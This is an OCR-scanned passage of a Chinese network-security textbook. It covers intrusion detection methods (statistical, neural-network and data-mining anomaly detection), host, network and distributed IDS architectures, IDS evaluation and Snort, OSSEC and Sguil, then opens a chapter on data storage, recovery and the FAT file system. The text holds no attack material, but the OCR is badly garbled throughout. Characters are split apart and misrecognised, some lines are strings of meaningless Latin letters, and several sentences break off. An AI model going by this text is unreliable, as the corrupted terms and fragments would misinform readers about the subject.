异 币 检测 的 思想 就 是 检测 发 现 系 统 异 稼 行为 的 安全 事件 ,所 以 这 种 检测 技术 的 关键 就 
是 需要 建立 正常 的 模式 ,然后 对 检测 到 的 事件 与 正常 的 模式 进行 科学 合理 的 比较 ,从 而 判断 
出 与 正 篆 模式 的 侦 离 程度 。 模 式 通常 使 用 一 组 系统 的 度量 来 定义 。 通 过 监视 对 象 的 行为 ， 
学 习 对 象 行 为 获得 这 个 对 象 的 正常 使 用 模式 ,进而 建立 对 和 象 行为 模型 。 度 量 是 指 系统 或 用 
户 行为 在 特定 方面 的 衡量 标准 。 因 此 ,每 个 度量 都 对 应 于 一 个 门限 什 。 基 于 异常 人 侵 检 测 
ASN Fe WE SF TIE. AGREE. BH md RÀ FLAP. 

1. 统计 分 析 

最 早 的 异常 检测 系统 有 来 用 的 是 统计 分 析 技 术 。 首 先 , 检 测 硕 根据 用 户 对 象 的 动作 为 每 


个 用 户 建 立 一 个 用 户 特 征 表 设 定 用 户 动 作 行为 的 门限 值 ,通过 比较 当前 特征 与 已 存储 的 门 


限 值 ,从 而 判断 是 否 异 瘦 行 为 。 

NIDES 是 一 个 典型 的 基于 统计 分 析 的 检测 系统 。NIDES 会 对 每 一 个 系统 用 户 和 系统 
主体 建立 历史 统计 模式 。 建 立 的 模式 被 定期 更 新 。 检 测 系 统 需 要 维护 一 个 由 行为 模式 组 成 
的 统计 数据 库 ,每 个 行为 模式 包含 一 系列 的 系统 度量 表示 特定 用 户 的 正常 行为 。NIDES 使 
用 Agent 实现 数据 提取 与 格式 定义 。 统 计 分 析 组 件 用 于 学 习 用 户 的 行为 ,实现 基于 异 稼 检 
测 的 入 侵 检 测 功 能 。 检 测 结 果 通 过 Archiver 存储 组 件 或 用 户 UI 传递 给 用 户 。 

异常 人 侵 检 测 系 统 无 须 像 误 用 检测 系统 那样 不 断 地 对 规则 库 进 行 更 新 与 维护 ,因为 这 
是 基于 统计 分 析 与 成 熟 的 概率 论 统计 理论 。 但 是 ,异常 人 侵 检 测 系 统 不 能 提供 对 入 侵 行 为 
的 实时 检测 ,而 且 也 不 能 对 检测 事件 的 时 间 上 的 前 后 相关 性 做 出 反应 ,因为 它 是 以 批 处 理 的 
方式 对 审计 事件 进行 分 析 的 。 画 外 ,怎样 确定 合适 的 门限 信也 需 非 常 的 谨慎 ,因为 门限 信 选 
择 不 当 会 导致 系统 出 现 大 量 的 错误 报警 。 

2. 神经 网 络 

神经 网 络 方法 对 用 户 行 为 具有 学 习 和 上 自 适 应 功能 ,根据 实际 检测 到 的 信息 有 效 地 加 以 
处 理 并 做 出 人 侵 可 能 性 的 判断 。 利 用 神经 网 络 所 具有 的 识别 、 分 类 和 归纳 能 力 , 可 以 使 人 侵 
检测 系统 适应 用 户 行 为 特征 的 可 变性 。 

在 实现 异常 人 侵 检 测 中 神经 网 络 的 处 理 主 要 包括 两 个 阶段 。 第 一 个 阶段 是 构造 人 侵 分 
析 模 型 的 检测 器 ,使 用 代表 用 户 行为 的 历史 行为 数据 对 检测 器 进行 训练 ,完成 网 络 的 构建 。 
第 二 个 阶段 是 入 侵 分 析 模 型 的 实际 运作 阶段 ,神经 网 络 接受 输入 的 事件 数据 ,将 其 与 历史 数 
据 相 比较 ,判断 两 组 数据 的 相似 度 。 

神经 网 络 方法 的 思想 就 是 经 过 训练 神经 进行 系统 日 我 学 习 与 更 新 ,从 而 达到 预测 的 效 
果 。 同 时 ,通过 提取 用 户 行为 的 模式 特征 来 创建 用 户 的 行为 特征 轮 廊 ,这 可 以 解决 用 户 行为 
的 动态 特征 ,以 及 搜 肝 数据 的 不 完整 性 \ 不 确定 性 所 造成 的 难以 精确 检测 的 问题 ,而 且 能 更 
好 地 表达 变量 间 的 非 线 性 关系 。 

但 是 ,神经 网 络 也 存在 一 些 缺 点 。 例 如 ,系统 形成 的 网 络 结构 不 够 稳定 ,而 且 神 经 网 络 
方法 无 法 对 被 判定 为 异 芝 事件 进行 详细 的 说 明 与 解释 ,这 就 导致 了 无 法 确定 人 侵 的 具体 信 
E LA, 42 HY a ee BA fe HJ D Td THE OL 。 
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这 些 检测 手段 提供 了 新 的 检测 途 

3. 数据 挖掘 

近年 来 ,数据 处 理 技术 大 火 。 数 据 挖 掘 技 术 的 目的 在 于 从 海量 数据 中 提取 出 用 户 所 需 
要 的 真实 数据 信息 。 在 实际 应 用 场景 中 ,对 和 象 行为 的 数据 信息 量 非常 大 ,利用 数据 挖掘 的 方 
法 可 以 从 大 量 的 数据 中 提取 需要 的 内 容 。 

目前 将 数据 挖 据 算 法 应 用 到 入 侵 检 测 系 统 ,包括 数据 分 类 、 关 联 分 析 、 序 列 挖 所 ,其 中 数 
据 分 类 用 于 连接 记录 的 误 用 检测 ,关联 和 序列 挖掘 用 于 用 户 行 为 模式 的 异常 检测 。 利 用 关 
联 分 析 和 序列 挖掘 ,提取 出 正常 情况 下 用 户 执 行 命令 的 相关 性 ,确定 每 个 用 户 的 历史 行为 模 
X ,如 图 14-2 所 示 。 通 过 对 正常 用 户 数据 和 当前 用 户 数据 的 挖掘 ,得 出 用 户 历 史 行 为 模式 

和 当前 行为 模式 ,可 以 通过 模式 来 判断 用 户 行 为 是 否 异 稼 。 








历史 行为 





数据 采集 及 预 处 理 模式 挖掘 模式 比较 | 输出 结果 


当前 数据 


图 14-2 用 户 行为 异常 检测 模块 结构 图 


基于 寞 第 检测 的 入 侵 检 测 系 统 在 于 只 检测 认为 非 正 党 行为 ,有 所 以 这 种 检测 模式 可 以 在 
对 安全 知识 不 了 解 的 基础 上 检测 出 攻击 。 


14.3 入侵 检测 系统 的 结构 与 分 类 


1. 基于 主机 的 入 侵 检测 系统 结构 

基于 主机 的 人 侵 检测 系统 (Host-based IDS. HIDS) 出 现在 20 世纪 80 年 代 初 期 , 那 时 
网 络 规模 还 比较 小 ,而 且 网 络 之 间 也 没有 完全 互联 。 在 这 样 的 环境 里 ,检查 可 疑 行 为 的 审计 
记录 相对 比较 容易 ,况且 在 当时 入 侵 行 为 非常 少 , 通 过 对 攻击 的 事后 分 析 就 可 以 防止 随后 的 
攻击 。 同 样 ,目前 HIDS 仍 使 用 审计 记录 ,但 主机 能 自动 进行 检测 ,而 且 能 准确 及 时 地 做 出 
Ww. 38 3$ .HIDS 监视 的 对 象 有 系统 、 事 件 和 安全 记录 , 当 这 些 被 检测 的 对 象 发 生变 化 
时 ,HIDS 就 会 发 出 警报 。 例 如 , 当 这 些 对 象 发 生变 化 时 ,HIDS 就 会 将 变化 情况 与 匹配 规 
则 进行 匹配 ,如果 匹 配 , 则 发 送 警 报 。 同 时 ,如 果 审 计 事 件 访 问 了 敏感 的 端口 ,也 会 发 送 

HIDS 的 主要 特点 如 下 。 

C) 监视 特定 的 系统 活动 。HIDS 监视 用 户 和 访问 文件 的 活动 ,包括 文件 访问 改变 文 
件 权 限 .试图 建立 新 的 可 执行 文件 或 试图 访问 特殊 的 设备 。 

(2) 检查 出 特别 攻击 。 对 于 那些 基于 网 络 的 人 侵 检 测 系 统 检测 不 到 的 攻击 ,就 可 以 利 
用 HIDS 来 检测 。 例 如 ,HIDS 检测 可 以 检测 来 自主 要 服务 器 键盘 的 攻击 ,而 这 个 攻击 是 不 
经 过 网 络 的 。 
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(3) 适合 子 网 环境 。HIDS 更 加 适合 于 对 于 交换 式 连接 和 进行 了 数据 加 密 的 子 网 环境 。 

(4) 实时 性 强 。HIDS 实时 性 极 强 ,可 以 在 攻击 者 发 起 攻击 之 前 发 现 攻 击 者 ,并 且 阻 止 
攻击 者 的 攻击 行为 。 

(5) 无 须 额外 便 件 设备 。HIDS 存在 于 现行 网 络 结构 之 中 ,包括 文件 服务 器 、Web 服务 
种 及 其 他 共享 货源 。 这 使 得 基于 主机 的 系统 效率 很 高 。 

2. 基于 网 络 的 入 侵 检 测 系 统 结构 

基于 网 络 的 人 侵 检 测 系 统 用 原始 的 网 络 包 作为 数据 源 , 对 网 络 包 进 行 抓 取 分 析 , 从 而 检 
测 是 否 存 在 入 侵 行为 。 

基于 网 络 的 IDS 通常 利用 一 个 运行 在 随机 模式 下 的 网 络 适 配 问 来 实时 检测 ,并 分 析 通 
过 网 络 的 所 有 通信 业务 。 它 的 攻击 辨识 模块 通常 使 用 4 种 常用 技术 来 标识 攻击 标志 : B 
A ARIAT MA OVA; 频率 或 穿越 国 值 ; 低级 时 间 的 相关 性 ; 在 统计 学 意义 上 的 非常 规 的 
安全 事件 的 检测 ,一 旦 检测 到 非常 规 的 事件 ,即将 该 事件 识别 为 攻击 行为 ,并 且 采 取 相 关 的 

3. 分 布 式 入 侵 检 测 系统 结构 

基于 主机 和 网 络 的 和 人 侵 检测 系统 已 经 无 法 满足 多 变 的 人 侵 攻 击 形式 。 因 此 , 越 来 越 多 
的 大 型 组 织 需要 对 由 LAN 或 互联 网 连接 起 来 的 分 布 式 主机 进行 有 效 的 安全 防护 。 虽 然 可 
以 在 单独 的 主机 上 进行 人 侵 检 测 进 而 实现 防护 ,但 是 更 加 有 效 的 防护 措施 是 通过 网 络 使 单 
机 人 人 慨 检 测 系 统 进 行 协 同 操作 。 

Porras 曾 指 出 在 设计 分 布 式 入 侵 检 测 系 统 时 需 关 注 的 问题 。 

(1) 分 布 式 人 侵 检 测 系 统 需 要 有 处理 不 同 审计 记录 格式 的 能 力 。 在 大 型 寞 构 的 环境 
中 ,不 同系 统 多 使 用 不 同 的 记录 收集 机 制 。 入 侵 检 测 系 统 的 安全 性 审计 记录 宕 菲 容 不 同 的 
格式 。 

(2) 需要 确保 数据 的 完整 性 和 机 密 性 。 在 分 布 式 和 人 侵 检测 系统 中 ,需要 一 个 或 多 个 主 
机 充当 数据 收集 和 分 析 的 特 主 机 , 仿 以 在 网 络 环境 下 传输 审计 数据 或 摘要 数据 。 确 保 数 据 
完整 性 ,用 于 防止 入 侵 者 通过 改变 传输 的 审计 信息 来 掩饰 攻击 行为 ; 确保 数据 传输 机 密 性 
在 于 防止 审计 记录 中 有 价值 的 内 容 泄露 。 

(3) 可 采用 集中 式 体 系 架 构 或 分 布 式 体 系 架 构 。 对 于 集中 式 体系 架构 ,所 有 的 审计 分 
析 与 审计 数据 部 将 放 在 单 台 计算 机 上 完成 ,使 用 这 样 的 架构 人 简化 数据 关联 分 析 的 过 程 ,但 会 
守 致 主机 性 能 成 为 系统 性 能 的 壮 贷 ,而 且 沉 考虑 单 点 故障 的 问题 。 对 于 分 布 式 体 系 结构 , 数 
据 的 审计 和 分 析 放 在 不 同 的 计算 机 上 实现 ,这 样 做 的 好 处 在 于 需要 在 计算 机 间 建 立 一 种 信 
县 交换 机 制 , 需 考虑 计算 机 问 的 协作 。 

以 加 利 福 尼 亚 大 学 戴 维 斯 分 校 开 发 的 分 布 式 人 侵 检 测 系 统 为 参考 , 了解 分 布 式 人 侵 检 
测 系统 的 体系 结构 。 这 个 人 侵 检 测 系 统 由 主机 代理 模块 .LAN 检测 代理 模块 和 中 央 管 理 关 


模块 组 成 ,如 图 14-3 所 示 。 


C1) 主机 代理 模块 : 这 个 模块 的 功能 是 审计 集合 。 本 模块 在 监控 系统 中 作为 后 台 模 块 
运行 ,其 目的 在 于 收集 主机 上 与 安全 相关 事件 的 数据 ,并 负责 将 收集 的 效 据 传 输 给 中 央 管 理 
船 。 主 机 代理 模块 的 设计 方案 如 图 14-4 所 示 。 代 理 获 取 所 有 由 原始 审计 收集 系统 生成 的 
审计 记录 ,通过 过 泪 手 段 从 原始 记录 中 提取 与 安全 相关 的 信息 记录 ,并 将 这 些 安全 记录 标准 


第 14 章 ， 入侵 检测 的 原理 及 应 卫 


rt PS 


WAN 





图 14-3 分 布 式 人 侵 检 测 体 系 结构 


化 为 主机 审计 记录 格式 。 接 看 ,模板 驱动 模块 会 对 这 些 审计 记录 进行 分 析 ,搜索 是 否 有 可疑 
行为 发 生 。 最 底层 的 工作 范畴 包括 扫描 明显 依 离 于 历史 记录 的 事件 .失败 的 文件 访问 、 系 统 访 
In] .修改 文件 访问 控制 等 。 高 层 的 代理 负责 寻找 是 否 有 与 攻击 模式 符合 的 事件 。 代 理 可 以 根 
据 用 户 的 历史 行为 曲线 寻找 是 否 有 异常 行为 发 生 , 如 被 执行 的 程序 数 或 是 锌 访问 的 文件 数 。 


OS 审计 信息 


EREET HER 
值得 注意 的 会 话 





图 14-4 主机 代理 体系 结构 


(2) LAN 监测 代理 模块 : 本 模块 的 工作 机 制 和 工作 方式 与 主机 代理 模块 相同 。 但 
LAN 检测 代理 模块 会 将 LAN 流量 进行 分 析 , 然 后 把 分 析 绪 条 报告 给 中 央 管 理 疹 。 

D "Re Bam PRR: 接受 来 日 LAN 检测 代理 模块 和 主机 代理 模块 的 报告 ,并 对 报告 
进行 关联 性 分 析 和 人 处理, 从 而 检测 攻击 。 

在 检测 到 可 疑 行为 后 ,中 央 管 理 带 会 捕获 传 出 的 报 芍 信息 。 中 央 管 理 带 内 置 的 专家 管 
理 系 统 可 以 从 接收 的 数据 中 得 出 绪论 。 除 此 之 外 ,管理 天 可 以 从 单个 系统 中 得 到 主机 审计 
记录 的 副本 ,将 副本 与 来 自 其 他 代理 审计 记录 进行 关联 分 析 ,得 到 更 全 面 的 分 析 绪 条。 

LAN 监测 代理 模块 为 中 央 管 理 带 提供 的 信息 主要 包括 设计 主机 与 主机 间 的 连接 、 服 务 使 
用 .通信 量 等 。 同 时 负责 搜索 网 络 负载 突变 .安全 相关 服务 的 使 用 及 网 络 上 下 程 登录 命令 。 

在 图 14-3 中 描述 的 分 布 式 入 侵 检 测 系 统 中 ,提供 了 一 种 从 处 理 单机 信息 的 入 侵 检 测 扩 
展 到 对 多 个 主机 进行 天 联 测试 的 分 布 式 入 侵 检 测 方 法 ,这 种 染 构 可 分 析 单 机 入 侵 检 测 系 统 
无 法 检测 到 的 入侵 行为 。 
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14.4 ”第 见 的 入 侵 检 测 系 统 及 评估 


14.4.1 入 侵 检 测 系 统 设 计 


入 侵 检 测 是 系统 安全 的 第 二 着 防线 ,在 设计 人 侵 检 测 系统 时 通常 需 考 感 以 下 几 个 方面 。 
自 先 ,入 侵 检 测 系 统 需 要 能 更 快 的 判断 入 侵 行 为 ,这 样 就 可 以 在 入 侵 痢 人 危害 系统 或 危害 数据 
安全 前 将 其 鉴别 并 驱 偿 出 系统 , 越 早 发 现 入 侵 行 为 会 使 系统 受 损 程度 越 小 ,系统 恢复 越 快 。 
其 次 ,局 效 的 入 侵 检 测 系 统 对 防护 入 侵 痢 攻击 起 到 威慑 作用 。 最 后 ,入 侵 检 测 系 统 中 收集 有 
效 的 人 侵 信息 ,并 将 这 些 信息 加 入 到 入 侵 系 统 中 实现 系统 增强 。 

和 人 侵 系 统 设计 过 程 的 设计 核心 在 于 如 何 区 别 用 户 行 为 和 入 侵 行为 。 入 侵 检 测 系 统 设计 
时 假定 入 侵 痢 行为 和 合法 用 户 的 行为 则 存在 可 量化 区 别 的 差别 。 但 在 实际 场景 中 ,并 不 是 
所 有 入 侵 痢 对 系统 资源 发 起 的 攻击 和 普通 用 户 授 权 访 问 系 统 的 行为 则 邦 有 明显 的 差别 。 因 
此 ,在 设计 过 程 中 ,如 来 对 入 侵 行为 的 定义 过 于 和 客 松 ,可 以 捕获 更 多 入 侵 行为 ,但 也 会 村 和 致 融 
误 报 率 ,或 痢 将 合法 用 户 识别 为 入 侵 痢 。 但 奢 对 入 侵 行 为 的 定义 过 于 严格 ,会 村 致 汤 报 率 增 
Kw RNA A. A. EA tee BSH Bere EP a BT PA ot AAT A o 


14.4.2 入侵 检 测 系统 评估 


在 对 入 侵 检 测 系 统 进行 测试 评 俩 时 ,大 部 分 的 测试 过 程 虱 遵循 以 下 的 基本 测试 步骤 。 
自 先 ,选择 创建 一 些 测试 工具 或 测试 脚本 。 然 后 使 用 这 些 脚 本 和 工具 用 来 生成 模拟 正常 行 
为 及 入 侵 行 为 。 接 看 就 是 模拟 入 侵 检 测 系 统 运行 的 实际 环境 ,确定 计算 环境 所 要 求 的 条 件 ， 
如 可 景 计算 机 活动 的 级 别 。 最 后 配置 运行 入侵 检测 系统 ,运行 测试 工具 或 测试 脚本 。 测 试 
完成 后 ,分 析 入 侵 检测 系统 的 检测 结 来 ,如 图 14-5 所 示 。 


测试 脚本 或 工具 | LÀ 
入 侵 检查 系统 





检测 测试 结果 ， 






运行 环境 





图 14-5 入 侵 检测 系统 评估 示意 图 


随 看 对 入 侵 检 测 技术 全 究 的 发 展 ,出 现 了 许多 入 侵 检 测 系 统 ,因此 也 产生 了 对 各 种 入 侵 
检测 系统 的 功能 和 性 能 评估 的 需求 。 评 价 入 侵 检测 系统 性 能 主要 包含 以 下 几 个 方面 。 

CI) 准确 性 : 古 指 入 侵 检测 系统 从 各 类 行为 中 能 够 正确 地 识别 入 侵 的 能 力 , 检 测 率 是 
指 检 测 系 统 发 出 正确 的 警报 的 概率 ,而 虚 瓷 率 是 指 检 测 系统 发 出 假 的 警报 的 概率 。 检 测 率 
男 外 ,检测 可 信和 度 代 表 的 是 检测 系统 的 结果 的 可 行 度 , 这 是 检测 系统 的 性 能 反应 的 重要 指 
标 。 在 实际 应 用 中 ,为 了 适应 不 同 的 网 络 环境 ,人 侵 检 测 系 统 的 实现 是 在 检测 率 与 索 报 率 之 
间 。 人 入 侵 检 测 系统 必 须 综 合 以 上 两 点 ,信和 以 提升 检测 准确 性 。 
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(2) 处 理性 能 : 是 指 一 个 人 侵 检 测 系 统 检测 的 速度 。 当 处 理事 件 的 性 能 没有 达到 要 求 
时 ,就 不 可 能 实现 实时 啊 应 ,从 而 束 会 影响 整个 系统 的 性 能 。 

(3) 完备 性 : 是 指 入 侵 检 测 系 统 可 以 识别 出 所 有 人 入侵 攻击 行为 的 能 力 。 如 有 果 存 在 一 个 
入 侵 行 为 ,未 被 人 侵 检 测 系 统 检测 出 来 ,那么 这 个 入 侵 检测 系统 就 不 具有 检测 完备 性 。 

(4) 抗 攻击 性 : 和 人 侵 检 测 系统 是 检测 人 侵 行 为 的 重要 手段 ,如 采 入 侵 检 测 系统 受到 了 
攻击 ,那么 攻击 痢 驶 可 以 非常 容 多 地 人 侵 整 个 应 用 系统 了 。 所 以 ,系统 安全 管理 肴 必须 要 你 
证 入侵 检测 系统 的 安全 性 ,防止 人 侵 检 测 系统 筱 攻破 。 态 外 ,还 必须 你 证 入侵 检测 系统 的 性 
能 ,你 证 其 检测 绪 采 的 准确 性 与 效率 上 的 局 效 性 。 入 侵 检 测 系统 目 身 必 须 具 有 一 定 的 抗 攻 
击 性 ,以 实现 能 够 抵御 外 部 攻击 者 对 入 侵 检 测 系 统 的 攻击 。 

CS) 及 时 性 : 及 时 性 要 求人 侵 检 测 系 统 必 须 尽 快 地 分 析 数 据 并 将 分 析 结 来 传递 给 系统 
上 层 , 以 使 系统 安全 管理 肴 能 够 在 人 侵 攻 击 尚 未 造成 更 大 危害 以 前 做 出 反应 ,进而 阻止 人 侵 
者 对 系统 进行 进一步 的 破坏 活动 。 

(6) 根据 上 述 的 几 个 评估 和 方 回 可 对 入 侵 检 测 系 统 进行 全 面 的 评 信 , 入 侵 检测 系统 的 评 
佑 技术 相 对 于 入 侵 检 测 技 术 而 言 出 现 得 更 晚 。 随 看 学 痢 们 不 断 的 深入 人 研究 ,入 侵 检 测 系 统 
的 评估 技术 会 更 加 成 熟 。 


14.4.3 入 侵 检 测 系统 介绍 


与 防火 墙 系 统 相 比 , 入 侵 检 测 系 统 可 以 关注 于 来 日 系统 内 部 的 攻击 ,和信 侵 检 测 系 统 的 安 
全 工作 做 得 更 加 全 面 。 表 14-1 所 示 为 著名 的 入侵 检测 系统 ， 
R 14-1 著名 入 侵 检 测 系 统 


名 称 来 F 
Snort Martin Roesch 
OSSEC HIDS Hay; Andrew 
Sguil Network Security Monitoring System 


(1) Snort。 这 是 一 个 几乎 人 人 都 喜爱 的 开源 IDS, 它 采用 灵活 的 基于 规则 的 语言 来 描 
述 通 信 ,将 签名 、 协 议和 不 正常 行为 的 检测 方法 结合 起 来 。Snort 的 检测 手段 主要 有 3 种 : 
协议 分 析 .内容 查找 及 预 处 理 程 序 。 

(2) OSSEC HIDS, OSSEC HIDS 的 检测 功能 有 执行 日 志 分 析 、 完 整 性 检查 、Windows 
注册 表 监 视 rootkit 检测 .实时 警告 .实时 啊 应 及 强大 的 日 志 分 析 引 擎 ,以 监视 和 分 析 其 防 
Kei IDS, Web 服务 大 和 号 份 验证 日 志 。 

(3) Sguil, Sguil 的 主要 部 件 是 一 个 直观 的 GUI 界面 ,可 以 检测 从 Snort/barnyard 提 
供 的 实时 的 事件 活动 ,同时 还 可 信 助 于 其 他 的 部 件 , 实 现 网 络 安全 监视 活动 和 IDS 警告 的 
事件 驱动 分 析 。 


14.5 本 全 小 结 


-前 主 要 介绍 了 入 侵 检测 技术 ,入 侵 检测 技术 主要 分 为 基于 寞 第 的 入侵 检测 技术 与 基 
于 误 用 的 检测 搁 术 。 根 据 实现 入 侵 检 测 的 场景 不 同 可 分 为 基于 主机 入 侵 检 测 、 基 于 网 络 入 
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侵 检 测 和 基于 分 布 式 入 侵 检 测 。 伽 要 介绍 了 入 侵 检 测 系 统 的 结构 及 设计 , 际 此 之 外 ,还 对 验 


收入 侵 检 测 系 统 即 人 


受 检测 系统 评 佑 标准 做 了 人 简单 介绍 。 





习题 14 


1. 


以 下 模块 属于 分 布 式 人 侵 检 测 系统 的 是 ( D. 


A. 主机 代理 模块 B. LAN 检测 代理 模块 
C. P AE BERTA D. 4 FP m fs DU PR ER 


. 人 简 述 防火 墙 与 人 侵 检 测 系 统 的 区 别 。 

. 简 述 基于 主机 与 基于 网 络 的 入 侵 检 测 系 统 的 区 别 。 
. 简 述 基于 误 用 的 入侵 检测 技术 手段 。 

. 人 简 述 基于 异常 的 人 侵 检 测 技术 手段 。 

.搭建 开源 和 人 侵 检 测 系 统 snort, 

.人 简 述 防火 墙 与 人 侵 检 测 设 备 的 区 别 。 
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随 着 多 媒体 、 大 型 数据 库 、 网 络 等 的 迅速 发 展 ,人 们 越 来 越 依 赖 数据 。 然 
而 现在 数据 泄露 .数据 破坏 等 现象 发 生 越 来 越 频 繁 ,因此 数据 安全 技术 变 得 
越 来 越 重 要 。 数 据 安 全 包括 数据 处 理 安全 数据 传输 安全 及 数据 存储 安全 。 

数据 处 理 安 全 是 指 在 数据 处 理 过 程 中 保证 数据 的 安全 ,如 防止 数据 泄 
露 、 防 止 数据 被 病毒 感染 等 。 

数据 传输 安全 是 指使 数据 安全 保密 传输 ,如 防止 明文 数据 传输 时 被 黑客 
截获 所 种 来 的 安全 隐患 。 

数据 存储 安全 是 指数 据 库 在 系统 运行 之 外 的 可 读 性 。 一 旦 数据 库 被 盗 ， 
即使 没有 原来 的 系统 程序 ,照样 可 以 另外 编写 程序 对 盗 取 的 数据 库 进 行 查看 
或 修改 。 从 这 个 角度 来 说 ,不 加 密 的 数据 库 是 不 安全 的 ,容易 造成 商业 泄密 ， 
所 以 便 衍 生出 数据 防 泄密 这 一 概念 ,这 就 涉及 了 计算 机 网 络 通 信和 的 保密 、 安 
全 及 软件 保护 等 问题 。 


15.1 数据 安全 基础 


15.1.1 数据 存储 技术 


在 信息 技术 时 代 , 数 据 的 处 理 、 传 输 、 存 储 是 最 基本 的 3 个 概念 ,其 中 数 
据 存储 技术 是 其 中 最 重要 的 环 市 之 一 

数据 存储 技术 的 发 展 主要 是 经 过 s 个 阶段， 分 别 是 磁盘 与 磁 市 存储 、 分 
布 式 存储 ,以 及 20 世纪 90 年 代 网 络 迅 速 发 展 所 市 来 的 变化 。 这 种 变化 主要 
是 以 下 3 个 方面 。 

(1) 存储 容量 急剧 脱 胀 。 

(2) 数据 存储 时 间 持 久 。 

(3) 数据 的 多 样 化 .地 理 上 的 分 散 、 对 重要 数据 的 保护 等 都 对 数据 存储 管 
理 提 出 更 高 的 要 求 。 

因为 存储 介质 的 不 一 梓 ,所 以 数据 存储 的 组 织 方式 也 会 不 一 梓 。 下 面 介 
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绍 磁 盘 、 磁 市 、 光 盘 这 3 种 存储 介质 。 


1. 磁盘 
Hr. 随机 读 写 设备 ,速度 快 。 
RAID 磁盘 阵列 (Redundant Arrays of Independent Disks): RAID 的 基本 思想 是 将 一 


AS ee ii T RE Ee BT BL GH H EK A IR Ht) LE. FA RAID FE h is Er FR R4 24 
控制 器 卡 ,将 数据 复制 到 整个 RAID 上 ,然后 继续 常规 的 操作 。 换 言 之 ,对 操作 系统 而 言 ,一 
个 RAID 看 起 来 就 像 是 一 个 大 容量 磁盘 ,但 是 具有 更 好 的 性 能 和 更 好 的 可 靠 性 。 

RAID 特点 : 将 NN vi ii ef RAID Controller 结合 成 虚拟 单 台大 容量 的 便 盘 使 用 ,其 
特点 是 N 台 人 硬盘 同时 工作 ,加 快速 度 及 提供 容错 性 。 

2. 磁带 

特点 : 顺序 读 写 设备 。 读 写 时 需要 相应 的 磁带 驱动 妖 , 如 同 录 音 带 或 录像 带 , 可 以 从 驱 
动 中 取出 ,实现 非 现场 方式 保存 ,可 长 时 间 存 放 旧 式 版 本 数据 ,也 可 以 重新 号 和信 数据 。 

位 市 信息 存储 可 徘 性 高 .成 本 低 、 容 量 

3. 光盘 

光盘 存储 天 是 指 利 用 光学 原理 存 取 信息 的 存储 融 , 其 基本 工作 原理 是 利用 激光 改变 一 
个 存储 单元 的 性 质 , 而 性 质 状 态 的 变化 可 以 表示 存储 的 数据 ,识别 性 质 状 态 的 变化 就 可 以 读 
出 存储 的 数据 。 

光盘 存储 大 具有 以 下 特点 。 

(OD 存储 密度 高 。 

(2) 非 接触 读 写 方式 。 

(3) 信息 保存 时 间 长 。 

(4) 盘面 抗 污 染 能 力 强 。 

(5) 价格 低廉 、 使 用 方便 。 


15.1.2 数据 恢复 技术 


1. 数据 恢复 的 定义 

(1) 所 谓 数 据 恢复 是 指数 据 损失 时 ,重新 恢复 保留 在 介质 上 的 数据 的 过 程 。 

(2) 在 一 般 情况 下 ,如 格式 化 时 一 般 都 是 可 以 恢复 数据 的 。 但 是 ,如 果 数 据 补 宪 基 了 ， 
那么 丢失 的 数据 将 无 法 被 恢 复 。 

(3) 保证 数据 的 完整 性 和 可 用 性 。 

2. 数据 故障 的 分 类 

(1) 逻辑 故障 : Teor KX VRE RMR REEL KR BERK SIS KARE 
失 病毒 破坏 、 黑 客 攻击 等 保证 数据 的 完整 性 和 可 用 性 。 

(2) 物理 故障 ; BIOS 不 认 盘 、 便 盘 异 啊 、 电 机 不 转 、 磁 涉 破坏 、 人 磁 组 变形 、 电 路 板 烧 坏 、 
Sh E Beats Hr ae SF a A re Ae 

3. 数据 恢复 的 范围 

(1) 数据 库 数 据 恢复 ; Access, FoxPro, SQL Serber, Oracle, MySQL, DB2, Informix, 
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SyBase 等 数据 库 修复 。 

(20 文件 修复 : 各 种 文件 破损 后 的 修复 。 文 持 Foxmail、 Outlook, Outlook Express, 
Exchange Server, Lotus Notes 等 邮件 数据 的 恢复 和 人 收复。 

(3) 密码 破解 : 破解 系统 密码 和 文件 密码 。 

4. 数据 恢复 的 一 般 性 原则 

OD 先 备份 ,后 操作 ，。 

(2) 调查 使 用 者 , 查 出 原因 。 

(3) 获得 最 后 的 关键 文件 信息 。 

(4) 认真 细致 ,考虑 周全 。 

o. 数据 恢复 的 流程 

检测 数据 损坏 程度 ,根据 检测 结果 明确 初步 恢复 周期 ,正式 进行 数据 恢复 。 恢 复方 式 分 
为 三 级 流程 。 

表现 : CMOS 能 识别 便 盘 。 

破坏 原因 : 系统 错误 造成 数据 丢失 , 误 分 区 . 误 删 除 . 误 克 隆 、 软 件 冲突 、 病 毒 破 坏 。 

恢复 方式 : 专用 数据 恢复 软件 .人 工 方 式 。 

(2) 硬件 外 体 的 恢复 。 

表现 : CMOS 不 能 识别 硬盘 。 

破坏 原因 : 电路 板 损 坏 、 数据 线 损坏 。 

恢复 方式 : 换 相 应 的 硬件 。 

(3) 人 硬件 内 体 的 恢复 。 

表现 : CMOS 不 能 识别 硬盘 ,人 硬盘 异 啊 。 

原因 : 物理 磁道 损坏 、. 内 电路 忆 片 击 千 、 磁 头 损坏 。 

修复 方式 : 内 电路 检修 ,在 超 兆 间 内 打开 盘 腔 修复 。 


15.2 FAT 文件 系统 


文件 是 最 常用 的 存储 体 记 录 数 据 的 载体 。 文 件 系 统 是 用 来 解决 如 何 将 文件 放 入 存储 体 
内 的 。 通 第 情况 下 ,存储 体会 完 分 割 成 右 干 分 区 ,再 在 其 中 存 和 文件。 所 以 ,最 初 可 以 这 样 
定义 文件 系统 : 用 来 解决 如 何 将 文件 放 入 分 区 内 的 一 种 方案 。 不 同 的 解决 方案 就 形成 了 不 
同 的 文件 系统 ,FAT 是 其 中 之 一 。 


15.2.1 硬盘 区 域 的 组 织 


便 盘 被 划分 为 5 个 区 域 , 即 MBR DBR FATJEDT M DATA, FDT Æ X. f X fF x 


件 大 小 ,以 及 文件 存放 的 起 始 复 号 及 结束 标志 ,系统 根据 这 些 信息 来 存 取 文件 。 

(OD 操作 系统 通过 调用 BIOS 的 INT13H 中 断 来 实现 文件 存 取 。INT13H 中 断 使 用 的 
参数 是 硬盘 的 物理 参数 。 

AH: 功能 号 (02 是 读 磁盘 ,01 ESAR). 
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AL: — KES BS DXX, 

BX: WFR m X E H hE. 

DH: H&S. 

DL: 磁盘 设备 号 (A 盘 是 0,B 盘 是 1 ,第 一 物理 硬盘 是 80 ,第 二 物理 便 盘 是 81) 。 

CH: 柱 面 号 的 低 8 位 。 

CL: 低 6 位 为 要 读 的 起 始 扇 区 号 ,高 两 位 为 柱 面 号 的 高 2 位 。 

操作 系统 巾 复 号 获取 磁头 号 、 柱 面 号 和 朵 区 号 的 过 程 如 下 。 

